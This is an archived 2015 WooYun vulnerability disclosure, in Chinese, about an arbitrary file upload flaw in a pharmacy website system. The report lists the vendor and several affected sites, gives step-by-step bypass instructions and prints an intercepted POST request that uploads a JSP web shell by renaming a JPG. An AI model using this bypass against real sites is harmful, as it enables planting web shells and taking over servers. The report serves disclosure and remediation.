乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-30: 细节已通知厂商并且等待厂商处理中 2015-04-03: 厂商已经确认,细节仅向厂商公开 2015-04-06: 细节向第三方安全合作伙伴开放 2015-05-28: 细节向核心白帽子及相关领域专家公开 2015-06-07: 细节向普通白帽子公开 2015-06-17: 细节向实习白帽子公开 2015-07-02: 细节向公众公开
杭州珍诚网络科技有限公司开发的大药房系统存在任意文件上传漏洞
厂商:
杭州珍诚网络科技有限公司 http://www.zc511.com/showIndex.do
http://www.ewj2009.com/http://www.nbzyyy.com/http://wzyst.net/http://www.yizheng.cc/http://www.zjrrt.com/
Upload Bug:
注册用户后登陆修改基本资料的头像上传处仅仅在本地进行了Javascrip校验,服务端没有校验文件上传的类型。注册会员---登录——基本资料修改——上传JPG头像——抓包修改为JSP——任意文件被上传<script>function uploadImg(value){ document.getElementById('textfield').value=value; testviewpic("showImg","textfield");} function testviewpic(m,im) { var mypic = document.getElementById(m); var imgfilepath = document.getElementById(im) var oldSrc = mypic.src; var myflag=0; //进行筛选的图片的扩展名 var aa = ".gif|.jpg|.jpeg|.bmp|.png"; //分离出可以通过的图片扩展名 var bb = aa.split('|'); //进行循环判断,路经是否为图片 for(var i=0;i<bb.length;i++) { //检索路径是否含有指定图片的扩展名 var cc = imgfilepath.value.toLowerCase().indexOf(bb[i]); if (cc > 0) { //当图片的路经中含有指定的扩展名时,对状态进行赋值 myflag=1; mypic.src=imgfilepath.value; mypic.style.display=""; mypic.border=1; break; } } //如果状态为错误,弹出信息框 if(myflag == 0) { alert("请选择图片文件"); //清除上传框的路径值 imgfilepath.outerHTML = imgfilepath.outerHTML; imgfilepath.value=""; mypic.src=oldSrc; document.getElementById("theFile").value=""; } } function fclick(){ $("#theFile").click(); }</script>
Upload POST:
POST /updateUserInfo.do HTTP/1.1Host: www.****.cnProxy-Connection: keep-aliveContent-Length: 6111Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://www.****.cnUser-Agent: ************Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYVYCBNAmsZCHFNFRReferer: http://www.*****.cn/getUserInfo.doAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: *********------WebKitFormBoundaryYVYCBNAmsZCHFNFRContent-Disposition: form-data; name="textfield"C:\fakepath\shell.jpg------WebKitFormBoundaryYVYCBNAmsZCHFNFRContent-Disposition: form-data; name="theFile"; filename="shell.jsp" //这里的类型可被随意控制Content-Type: image/jpegshellcode------WebKitFormBoundaryYVYCBNAmsZCHFNFRContent-Disposition: form-data; name="userName"test------WebKitFormBoundaryYVYCBNAmsZCHFNFRContent-Disposition: form-data; name="userNickName"test------WebKitFormBoundaryYVYCBNAmsZCHFNFRContent-Disposition: form-data; name="userAddress"------WebKitFormBoundaryYVYCBNAmsZCHFNFRContent-Disposition: form-data; name="postCode"------WebKitFormBoundaryYVYCBNAmsZCHFNFRContent-Disposition: form-data; name="mobile"------WebKitFormBoundaryYVYCBNAmsZCHFNFRContent-Disposition: form-data; name="phone"------WebKitFormBoundaryYVYCBNAmsZCHFNFR--
以其中一个案例进行测试:
1、 提示更新成功后查看头像地址:
提示更新成功后查看头像地址:
危害等级:高
漏洞Rank:11
确认时间:2015-04-03 14:39
CNVD确认并复现所述情况,已经转由CNCERT下发给浙江分中心,由其后续协调网站管理单位处置。
暂无